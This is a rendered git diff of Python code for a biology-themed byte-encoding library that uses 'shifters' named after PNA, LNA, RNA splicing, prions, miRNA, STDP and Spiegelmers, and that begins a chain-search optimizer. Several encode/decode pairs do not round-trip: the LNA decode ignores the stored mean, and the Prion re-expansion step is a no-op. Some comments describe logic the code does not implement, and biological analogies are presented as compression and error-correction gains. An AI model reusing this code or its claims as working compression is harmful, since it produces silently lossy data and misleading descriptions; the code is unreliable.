new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(peptide), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Reverse translation: amino acid → most likely codon → RNA."""
|
|
||||||
data = state.encoded
|
|
||||||
|
|
||||||
result = []
|
|
||||||
for b in data:
|
|
||||||
aa = chr(b)
|
|
||||||
if aa in AMINO_CODONS:
|
|
||||||
# Pick first available codon
|
|
||||||
codon = AMINO_CODONS[aa][0]
|
|
||||||
result.extend(ord(c) for c in codon)
|
|
||||||
else:
|
|
||||||
result.extend([ord('N'), ord('N'), ord('N')]) # Unknown
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 6: PNA (Peptide Nucleic Acid — peptide backbone)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Neutral backbone, tighter binding. Treat as structural variant.
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class PNAShifter(Shifter):
|
|
||||||
name = "PNA"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""PNA encoding: peptide backbone modification.
|
|
||||||
The neutral backbone allows stronger binding = more stable encoding.
|
|
||||||
We represent this as an error-correcting code.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
# PNA can handle higher density: add parity nibbles
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
result.append(b)
|
|
||||||
# Add parity nibble as error correction (PNA stability bonus)
|
|
||||||
parity = (b ^ (b >> 4)) & 0x0F
|
|
||||||
result.append(0x50 | parity) # PNA marker + parity
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""PNA decoding: strip parity, error correct."""
|
|
||||||
data = state.encoded
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(data) - 1, 2):
|
|
||||||
byte_val = data[i]
|
|
||||||
parity_marker = data[i+1]
|
|
||||||
expected_parity = (byte_val ^ (byte_val >> 4)) & 0x0F
|
|
||||||
actual_parity = parity_marker & 0x0F
|
|
||||||
# If parity mismatch, try to correct
|
|
||||||
if expected_parity != actual_parity:
|
|
||||||
# Simple correction: flip bits until parity matches
|
|
||||||
corrected = byte_val
|
|
||||||
for bit in range(8):
|
|
||||||
test = byte_val ^ (1 << bit)
|
|
||||||
if ((test ^ (test >> 4)) & 0x0F) == actual_parity:
|
|
||||||
corrected = test
|
|
||||||
break
|
|
||||||
result.append(corrected)
|
|
||||||
else:
|
|
||||||
result.append(byte_val)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 7: LNA (Locked Nucleic Acid — thermally stable)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Locked ribose = rigid structure = higher thermal stability threshold
|
|
||||||
# Represent as temperature-gated encoding
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class LNAShifter(Shifter):
|
|
||||||
name = "LNA"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""LNA encoding: lock byte positions for thermal stability.
|
|
||||||
Represents as a stable temperature-invariant compressed form.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
|
|
||||||
# LNA "locks" the structure — store as delta from mean
|
|
||||||
if not data:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
mean = sum(data) / len(data)
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
# Encode as deviation from mean (smaller = more stable)
|
|
||||||
dev = b - int(mean)
|
|
||||||
dk, dt = pist_encode(abs(dev))
|
|
||||||
result.append(dk)
|
|
||||||
result.append(dt if dev >= 0 else dt | 0x80)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""LNA decoding."""
|
|
||||||
data = state.encoded
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(data) - 1, 2):
|
|
||||||
dk = data[i]
|
|
||||||
dt = data[i+1] & 0x7F
|
|
||||||
negative = (data[i+1] & 0x80) != 0
|
|
||||||
abs_val = dk * dk + dt if dk >= 0 else 0
|
|
||||||
if negative:
|
|
||||||
result.append(128 - min(abs_val, 128))
|
|
||||||
else:
|
|
||||||
result.append(128 + min(abs_val, 127))
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 8: RNA SPLICING (intron removal → compression)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Splicing removes introns (non-coding regions) and joins exons.
|
|
||||||
# Analogy: remove redundant/low-signal bytes, keep high-signal.
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class SplicingShifter(Shifter):
|
|
||||||
name = "Splicing"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Splicing: remove non-informative bytes based on PIST tension.
|
|
||||||
Low-tension bytes are "introns" → spliced out.
|
|
||||||
High-tension bytes are "exons" → retained.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
|
|
||||||
# Compute PIST tension for each byte
|
|
||||||
exons = bytearray()
|
|
||||||
splice_sites = [] # (start, end) of retained regions
|
|
||||||
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
k, t = pist_encode(data[i])
|
|
||||||
mass = pist_mass(k, t)
|
|
||||||
tension = t / max(1, 2 * k + 1)
|
|
||||||
|
|
||||||
# Exon if tension > 0.3 (seismic half) or repeating pattern
|
|
||||||
if mass > 0 or (i > 0 and data[i] == data[i-1]):
|
|
||||||
exons.append(data[i])
|
|
||||||
if not splice_sites or splice_sites[-1][1] < i:
|
|
||||||
splice_sites.append((i, i+1))
|
|
||||||
else:
|
|
||||||
splice_sites[-1] = (splice_sites[-1][0], i+1)
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
# Store exon data + splice site mapping
|
|
||||||
result = bytearray()
|
|
||||||
result.extend(struct.pack('>H', len(splice_sites)))
|
|
||||||
for start, end in splice_sites[:255]:
|
|
||||||
result.append(min(start, 255))
|
|
||||||
result.append(min(end - start, 255))
|
|
||||||
result.extend(exons)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
new_state.metadata['splice_sites'] = splice_sites
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Reverse splicing. Reconstruct original positions."""
|
|
||||||
data = state.encoded
|
|
||||||
if len(data) < 2:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
num_sites = struct.unpack('>H', data[0:2])[0]
|
|
||||||
ptr = 2
|
|
||||||
splice_sites = []
|
|
||||||
for _ in range(min(num_sites, len(data[ptr:]) // 2)):
|
|
||||||
if ptr + 1 < len(data):
|
|
||||||
start = data[ptr]
|
|
||||||
length = data[ptr+1]
|
|
||||||
splice_sites.append((start, start + length))
|
|
||||||
ptr += 2
|
|
||||||
|
|
||||||
exons = data[ptr:]
|
|
||||||
|
|
||||||
# Reconstruct with zeros at un-spliced positions
|
|
||||||
result = bytearray()
|
|
||||||
exon_idx = 0
|
|
||||||
for start, end in splice_sites:
|
|
||||||
while exon_idx < start and exon_idx < len(exons):
|
|
||||||
result.append(exons[exon_idx])
|
|
||||||
exon_idx += 1
|
|
||||||
for _ in range(end - start):
|
|
||||||
if exon_idx < len(exons):
|
|
||||||
result.append(exons[exon_idx])
|
|
||||||
exon_idx += 1
|
|
||||||
else:
|
|
||||||
result.append(0)
|
|
||||||
|
|
||||||
# Append remaining
|
|
||||||
while exon_idx < len(exons):
|
|
||||||
result.append(exons[exon_idx])
|
|
||||||
exon_idx += 1
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 9: PRION (self-propagating conformational shift)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Prions are self-propagating: once a conformation exists, it spreads.
|
|
||||||
# Analogy: repeating patterns amplify themselves exponentially.
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class PrionShifter(Shifter):
|
|
||||||
name = "Prion"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Prion encoding: self-propagating conformational pattern.
|
|
||||||
|
|
||||||
Find dominant byte pattern and propagate it as a "prion strain."
|
|
||||||
The pattern then converts all similar bytes to the strain conformation.
|
|
||||||
Result: massive compression via conformational collapse.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
if not data:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
# Find dominant byte (+ nearest neighbors as "prion seed")
|
|
||||||
counts = Counter(data)
|
|
||||||
prion_seed = counts.most_common(1)[0][0]
|
|
||||||
|
|
||||||
# Find all occurrences within Hamming distance 1 of prion seed
|
|
||||||
converted = bytearray()
|
|
||||||
conversion_map = {} # byte → prion conformer
|
|
||||||
|
|
||||||
for b in data:
|
|
||||||
if b == prion_seed or abs(b - prion_seed) <= 1:
|
|
||||||
# Convert to prion conformation (compact form)
|
|
||||||
converted.append(prion_seed)
|
|
||||||
conversion_map[b] = 1 # converted
|
|
||||||
else:
|
|
||||||
# Different prion strain or resistant
|
|
||||||
converted.append(b)
|
|
||||||
conversion_map[b] = 0 # resistant
|
|
||||||
|
|
||||||
# Separate into prion domain and resistant domain
|
|
||||||
prion_domain = bytearray()
|
|
||||||
resistant_domain = bytearray()
|
|
||||||
resistant_positions = []
|
|
||||||
|
|
||||||
for i, b in enumerate(converted):
|
|
||||||
if b == prion_seed:
|
|
||||||
prion_domain.append(b)
|
|
||||||
else:
|
|
||||||
resistant_domain.append(b)
|
|
||||||
resistant_positions.append(i)
|
|
||||||
|
|
||||||
# Store: prion_seed, ratio_of_conversion, prion_domain, resistant_mapping
|
|
||||||
result = bytearray()
|
|
||||||
result.append(prion_seed)
|
|
||||||
conversion_ratio = len(prion_domain) / max(1, len(converted))
|
|
||||||
result.append(min(255, int(conversion_ratio * 255)))
|
|
||||||
|
|
||||||
# Prion domain (RLE compressed — prions are repetitive!)
|
|
||||||
rle_prion = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(prion_domain):
|
|
||||||
j = i
|
|
||||||
while j < len(prion_domain) and prion_domain[j] == prion_domain[i]:
|
|
||||||
j += 1
|
|
||||||
run = j - i
|
|
||||||
if run >= 3:
|
|
||||||
rle_prion.append(0xFD)
|
|
||||||
rle_prion.append(prion_domain[i])
|
|
||||||
rle_prion.append(min(255, run))
|
|
||||||
else:
|
|
||||||
for _ in range(run):
|
|
||||||
rle_prion.append(prion_domain[i])
|
|
||||||
i = j
|
|
||||||
|
|
||||||
result.extend(struct.pack('>I', len(rle_prion)))
|
|
||||||
result.extend(rle_prion)
|
|
||||||
|
|
||||||
# Resistant domain
|
|
||||||
result.extend(struct.pack('>I', len(resistant_domain)))
|
|
||||||
result.extend(resistant_domain)
|
|
||||||
for pos in resistant_positions[:255]:
|
|
||||||
result.append(min(pos, 255))
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
new_state.metadata['prion_seed'] = prion_seed
|
|
||||||
new_state.metadata['conversion_ratio'] = conversion_ratio
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Reverse prion propagation."""
|
|
||||||
data = state.encoded
|
|
||||||
if not data:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
ptr = 0
|
|
||||||
prion_seed = data[ptr]; ptr += 1
|
|
||||||
conversion_ratio = data[ptr] / 255.0 if data[ptr] > 0 else 0; ptr += 1
|
|
||||||
|
|
||||||
# Read prion domain length
|
|
||||||
if ptr + 4 > len(data):
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
prion_len = struct.unpack('>I', data[ptr:ptr+4])[0]; ptr += 4
|
|
||||||
|
|
||||||
# Expand RLE prion domain
|
|
||||||
prion_domain = bytearray()
|
|
||||||
prion_end = min(ptr + prion_len, len(data))
|
|
||||||
i = ptr
|
|
||||||
while i < prion_end:
|
|
||||||
if data[i] == 0xFD and i + 3 <= prion_end:
|
|
||||||
val = data[i+1]
|
|
||||||
run = data[i+2]
|
|
||||||
prion_domain.extend([val] * run)
|
|
||||||
i += 3
|
|
||||||
else:
|
|
||||||
prion_domain.append(data[i])
|
|
||||||
i += 1
|
|
||||||
ptr = prion_end
|
|
||||||
|
|
||||||
# Read resistant domain
|
|
||||||
if ptr + 4 > len(data):
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(prion_domain), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
resist_len = struct.unpack('>I', data[ptr:ptr+4])[0]; ptr += 4
|
|
||||||
resist_end = min(ptr + resist_len, len(data))
|
|
||||||
resistant_domain = data[ptr:resist_end]
|
|
||||||
ptr = resist_end
|
|
||||||
|
|
||||||
# Read positions (best effort)
|
|
||||||
positions = list(data[ptr:])
|
|
||||||
|
|
||||||
# Interleave: prion domain + resistant domain at specified positions
|
|
||||||
result = bytearray()
|
|
||||||
prion_idx = 0
|
|
||||||
resist_idx = 0
|
|
||||||
|
|
||||||
total_len = len(prion_domain) + len(resistant_domain)
|
|
||||||
for pos in range(total_len):
|
|
||||||
if pos in positions and resist_idx < len(resistant_domain):
|
|
||||||
result.append(resistant_domain[resist_idx])
|
|
||||||
resist_idx += 1
|
|
||||||
elif prion_idx < len(prion_domain):
|
|
||||||
result.append(prion_domain[prion_idx])
|
|
||||||
prion_idx += 1
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
|
|
||||||
# Re-expand prion conformers
|
|
||||||
prion_val = prion_seed
|
|
||||||
final = bytearray()
|
|
||||||
for b in result:
|
|
||||||
if b == prion_val:
|
|
||||||
final.append(b)
|
|
||||||
else:
|
|
||||||
final.append(b)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(final), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
File diff suppressed because it is too large
Load diff
|
|
@ -1,769 +0,0 @@
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# PIST Biological Polymorphic Shifter v3.0 — PART 4
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Shifters 25–27: miRNA, STDP, Spiegelmer
|
|
||||||
# Optimizer: BiologicalManifoldOptimizer (genetic search)
|
|
||||||
# Compressor: BiologicalPolymorphicCompressor (unified API)
|
|
||||||
# Demo: demonstrate() — test all data types and shifter chains
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
import hashlib
|
|
||||||
import math
|
|
||||||
import random
|
|
||||||
import struct
|
|
||||||
from collections import Counter, defaultdict
|
|
||||||
from copy import deepcopy
|
|
||||||
from heapq import heappush, heappop
|
|
||||||
|
|
||||||
from pist_biological_polymorphic_shifter_v3 import (
|
|
||||||
Shifter, ManifoldState, NExponent, intrinsic_load,
|
|
||||||
pist_encode, pist_decode, pist_mass, pist_mirror,
|
|
||||||
pist_normalized_tension, pist_phase_str, PHI
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 25: miRNA (MicroRNA — post-transcriptional regulation)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# miRNA silences genes by binding to complementary mRNA.
|
|
||||||
# Analogy: low-frequency bytes are "silenced" (removed or marked),
|
|
||||||
# while high-frequency bytes are "expressed" (retained).
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class miRNA_Shifter(Shifter):
|
|
||||||
name = "miRNA"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Apply miRNA-like regulation: silence low-frequency bytes.
|
|
||||||
|
|
||||||
Bytes below a frequency threshold are "silenced" (replaced with
|
|
||||||
a marker). The miRNA seed region is the frequency distribution.
|
|
||||||
Only "expressed" bytes survive at full fidelity.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
if not data:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
freq = Counter(data)
|
|
||||||
total = len(data)
|
|
||||||
threshold = max(1, total // 16) # silence bytes appearing < 6.25%
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
silent_map = bytearray()
|
|
||||||
for b in data:
|
|
||||||
if freq[b] >= threshold:
|
|
||||||
result.append(b) # expressed
|
|
||||||
else:
|
|
||||||
result.append(0xFB) # silenced marker
|
|
||||||
silent_map.append(b) # store for recovery
|
|
||||||
|
|
||||||
# Store silent bytes as compressed tail
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
new_state.metadata['mirna_threshold'] = threshold
|
|
||||||
new_state.metadata['mirna_silent'] = bytes(silent_map)
|
|
||||||
new_state.metadata['mirna_freq'] = dict(freq.most_common(16))
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Restore silenced bytes from stored map."""
|
|
||||||
data = state.encoded
|
|
||||||
silent_bytes = state.metadata.get('mirna_silent', b'')
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
si = 0
|
|
||||||
for b in data:
|
|
||||||
if b == 0xFB and si < len(silent_bytes):
|
|
||||||
result.append(silent_bytes[si])
|
|
||||||
si += 1
|
|
||||||
else:
|
|
||||||
result.append(b)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 26: STDP (Spike-Timing-Dependent Plasticity)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# STDP: if pre-synaptic spike precedes post-synaptic spike → strengthen.
|
|
||||||
# If pre follows post → weaken. Long-term potentiation/depression.
|
|
||||||
# Analogy: byte pairs that appear in a "causal" order (frequent adjacent pairs)
|
|
||||||
# get strengthened (merged). Rare transitions get weakened (split).
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class STDPShifter(Shifter):
|
|
||||||
name = "STDP"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Apply STDP-like learning to byte transitions.
|
|
||||||
|
|
||||||
Frequent adjacent byte pairs = "strengthened" (merged into single byte).
|
|
||||||
Rare transitions = "weakened" (marked for splitting).
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
if not data:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
# Count adjacent byte pairs
|
|
||||||
pairs = Counter()
|
|
||||||
for i in range(len(data) - 1):
|
|
||||||
pair = (data[i], data[i + 1])
|
|
||||||
pairs[pair] += 1
|
|
||||||
|
|
||||||
total_pairs = sum(pairs.values())
|
|
||||||
if total_pairs == 0:
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(b'', cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
# Merge frequent pairs above threshold
|
|
||||||
threshold = max(2, total_pairs // 64)
|
|
||||||
merge_map = {}
|
|
||||||
next_code = 128 # use upper half for merged codes
|
|
||||||
|
|
||||||
for pair, count in pairs.most_common():
|
|
||||||
if count < threshold or next_code >= 256:
|
|
||||||
break
|
|
||||||
merge_map[pair] = next_code
|
|
||||||
next_code += 1
|
|
||||||
|
|
||||||
# Apply STDP merging
|
|
||||||
result = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if i + 1 < len(data):
|
|
||||||
pair = (data[i], data[i + 1])
|
|
||||||
if pair in merge_map:
|
|
||||||
result.append(merge_map[pair])
|
|
||||||
i += 2
|
|
||||||
continue
|
|
||||||
result.append(data[i])
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
# Store inverse mapping
|
|
||||||
inv_merge = {}
|
|
||||||
for pair, code in merge_map.items():
|
|
||||||
inv_merge[code] = pair
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
new_state.metadata['stdp_merge'] = inv_merge
|
|
||||||
new_state.metadata['stdp_threshold'] = threshold
|
|
||||||
new_state.metadata['stdp_merged_pairs'] = len(merge_map)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Expand STDP merged pairs back to original bytes."""
|
|
||||||
data = state.encoded
|
|
||||||
inv_merge = state.metadata.get('stdp_merge', {})
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
if b in inv_merge:
|
|
||||||
pair = inv_merge[b]
|
|
||||||
result.append(pair[0])
|
|
||||||
result.append(pair[1])
|
|
||||||
else:
|
|
||||||
result.append(b)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 27: SPIEGELMER (L-DNA mirror image)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Spiegelmers are L-DNA mirror images of natural D-DNA.
|
|
||||||
# They are completely nuclease-resistant because no natural enzyme
|
|
||||||
# can recognize the mirror-image backbone.
|
|
||||||
# Analogy: apply a byte-wise mirror transformation that is
|
|
||||||
# "invisible" to standard decoding algorithms.
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class SpiegelmerShifter(Shifter):
|
|
||||||
name = "Spiegelmer"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Apply Spiegelmer mirror transformation.
|
|
||||||
|
|
||||||
Map each byte to its bit-reversed mirror (mirror image).
|
|
||||||
L-DNA = D-DNA reflected in mirror.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
# Bit reversal
|
|
||||||
rev = int(format(b, '08b')[::-1], 2)
|
|
||||||
result.append(rev)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Reverse Spiegelmer (bit reversal is self-inverse)."""
|
|
||||||
# Same as encode (bit reversal is an involution)
|
|
||||||
return cls.encode(state)
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# BIOLOGICAL MANIFOLD OPTIMIZER
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Genetic algorithm that searches the space of ALL possible shifter chains
|
|
||||||
# to find the optimal combination for a given input.
|
|
||||||
#
|
|
||||||
# ANY combination with ANY combination is allowed.
|
|
||||||
# The optimizer uses:
|
|
||||||
# - Beam search: keep top-K chains at each step
|
|
||||||
# - Fitness: compression_ratio × computational_efficiency × stability
|
|
||||||
# - Crossover: combine best chains
|
|
||||||
# - Mutation: add/remove/reorder shifters
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class BiologicalManifoldOptimizer:
|
|
||||||
"""Searches for optimal shifter chains using beam search + evolution."""
|
|
||||||
|
|
||||||
# All available shifters for the optimizer
|
|
||||||
ALL_SHIFTERS = [
|
|
||||||
# Synthetic DNA
|
|
||||||
'Hachimoji', 'AEGIS', 'NaturalDNA',
|
|
||||||
# RNA Processing
|
|
||||||
'Transcription', 'Translation', 'Splicing', 'miRNA',
|
|
||||||
# Backbone XNAs
|
|
||||||
'PNA', 'LNA', 'Morpholino', 'Spiegelmer',
|
|
||||||
# Prion/Epigenetic
|
|
||||||
'Prion',
|
|
||||||
# Neuronal
|
|
||||||
'SpikeTiming', 'STDP',
|
|
||||||
# Mycelial
|
|
||||||
'HyphalNet',
|
|
||||||
# Chaotic/Galois
|
|
||||||
'LogisticMap', 'GaloisRing', 'SBox', 'CellularAutomata',
|
|
||||||
# PIST Geometry
|
|
||||||
'PIST', 'PISTMirror', 'PISTResonance',
|
|
||||||
# Arithmetic
|
|
||||||
'DeltaGCL', 'RunLength', 'Huffman',
|
|
||||||
# Stochastic Engine
|
|
||||||
'DeterministicStochastic',
|
|
||||||
# Cellular Automata variants
|
|
||||||
'Wireworld',
|
|
||||||
]
|
|
||||||
|
|
||||||
SHIFTER_CLASSES = {
|
|
||||||
'Hachimoji': 'HachimojiShifter',
|
|
||||||
'AEGIS': 'AEGISShifter',
|
|
||||||
'NaturalDNA': 'NaturalDNAShifter',
|
|
||||||
'Transcription': 'TranscriptionShifter',
|
|
||||||
'Translation': 'TranslationShifter',
|
|
||||||
'Splicing': 'SplicingShifter',
|
|
||||||
'miRNA': 'miRNA_Shifter',
|
|
||||||
'PNA': 'PNAShifter',
|
|
||||||
'LNA': 'LNAShifter',
|
|
||||||
'Morpholino': 'MorpholinoShifter',
|
|
||||||
'Spiegelmer': 'SpiegelmerShifter',
|
|
||||||
'Prion': 'PrionShifter',
|
|
||||||
'SpikeTiming': 'SpikeTimingShifter',
|
|
||||||
'STDP': 'STDPShifter',
|
|
||||||
'HyphalNet': 'HyphalNetShifter',
|
|
||||||
'LogisticMap': 'LogisticMapShifter',
|
|
||||||
'GaloisRing': 'GaloisRingShifter',
|
|
||||||
'SBox': 'SBoxShifter',
|
|
||||||
'CellularAutomata': 'CellularAutomataShifter',
|
|
||||||
'Wireworld': 'WireworldShifter',
|
|
||||||
'PIST': 'PISTShifter',
|
|
||||||
'PISTMirror': 'PISTMirrorShifter',
|
|
||||||
'PISTResonance': 'PISTResonanceShifter',
|
|
||||||
'DeltaGCL': 'DeltaGCLShifter',
|
|
||||||
'RunLength': 'RunLengthShifter',
|
|
||||||
'Huffman': 'HuffmanShifter',
|
|
||||||
'DeterministicStochastic': 'DeterministicStochasticEngine',
|
|
||||||
}
|
|
||||||
|
|
||||||
def __init__(self, max_chain_length: int = 6, beam_width: int = 8):
|
|
||||||
self.max_chain_length = max_chain_length
|
|
||||||
self.beam_width = beam_width
|
|
||||||
self._imported = False
|
|
||||||
|
|
||||||
def _import_shifters(self):
|
|
||||||
"""Lazy import of all shifter classes."""
|
|
||||||
if self._imported:
|
|
||||||
return
|
|
||||||
|
|
||||||
from pist_biological_polymorphic_shifter_v3 import (
|
|
||||||
HachimojiShifter, AEGISShifter, NaturalDNAShifter,
|
|
||||||
TranscriptionShifter, TranslationShifter, SplicingShifter,
|
|
||||||
PNAShifter, LNAShifter, PrionShifter)
|
|
||||||
from pist_biological_polymorphic_shifter_v3_part2 import (
|
|
||||||
SpikeTimingShifter, HyphalNetShifter, LogisticMapShifter,
|
|
||||||
GaloisRingShifter, SBoxShifter, WireworldShifter,
|
|
||||||
MorpholinoShifter, PISTShifter, PISTMirrorShifter,
|
|
